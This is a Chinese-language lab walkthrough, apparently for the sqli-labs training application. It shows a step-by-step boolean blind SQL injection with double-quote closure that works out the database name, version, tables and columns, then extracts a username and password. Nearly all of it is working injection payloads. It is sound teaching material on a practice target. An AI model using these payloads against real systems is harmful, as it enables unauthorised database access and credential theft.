1.初始状态:
2.输入?id=1 and 1=2--+发现没有报错:
加个单引号仍没有变化,下一步考虑用双引号:
?id=1' and 1=2--+
3.加个双引号发现可以继续进行:
?id=1" and 1=2--+
4.猜测字段数发现从1至3都没变化,到4产生报错,说明字段数为3:
?id=1" order by 4--+
5.寻找显示位发现无法使用前四关的方法继续进行了,下一步骤开始尝试盲注:
?id=-1" union select 1,2,3--+
6.先猜当前数据库名字长度:
发现除了8以外的其他数都没有黄色字体显示:
除8以外:
?id=1" and length(database())=5--+
8:
?id=1" and length(database())=8--+
7.尝试猜测数据库版本:
?id=1" and left(version(),1)='5'--+
?id=1" and left(version(),3)='5.7'--+
?id=1" and left(version(),5)='5.7.2'--+
?id=1" and left(version(),6)='5.7.26'--+
以上一步一步猜出数据库版本每位数是多少,从而得知当前数据库版本为5.7.26
8.开始逐位猜测数据库名:
ASCII编码对照表:https://ascii.911cha.com/
?id=1" and left(database(),1)='s'--+
?id=1" and left(database(),2)='se'--+
?id=1" and left(database(),3)='sec'--+
?id=1" and left(database(),4)='secu'--+
?id=1" and left(database(),5)='secur'--+
?id=1" and left(database(),6)='securi'--+
?id=1" and left(database(),7)='securit'--+
?id=1" and left(database(),8)='security'--+
由于步骤6已确定当前数据库名字长度为8,故可以确定当前数据库为security
9.先猜当前数据库一共有多少个表。发现当值为4时,正常显示,故而表数为4:
?id=1" and (select count(table_name) from information_schema.tables where table_schema='security')=4--+
10.分别猜出这4个表的名字长度:
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6--+
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8--+
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 2,1)=7--+
?id=1" and (select length(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5--+
由上可知,这4个表名字长度分别为6,8,7,5
11.目的是找到users表,假设第四个表为users表:
?id=1" and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+
验证成功。
12.猜出users表的列数:
?id=1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3--+
可知users表列数为3
13.分别猜出users表列名长度:
?id=1" and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=2--+
?id=1" and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)=8--+
?id=1" and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 2,1)=8--+
14.分别猜出列的名字:
(1)猜猜第一个列名是不是id:
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1)='i'--+
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id'--+
(2)猜猜第二个列名是不是username:
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1)='u'--+
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),8)='username'--+
(3)猜猜第三个列名是不是password:
?id=1" and left((select (column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),8)='password'--+
15.猜第一个用户名及其密码的长度:
?id=1" and (select length(username) from users limit 0,1)=4--+
?id=1" and (select length(password) from users limit 0,1)=4--+
16.猜解用户名及密码,根据经验猜想为Dumb
?id=1" and left((select username from users limit 0,1),4)='Dumb'--+
?id=1" and left((select password from users limit 0,1),4)='Dumb'--+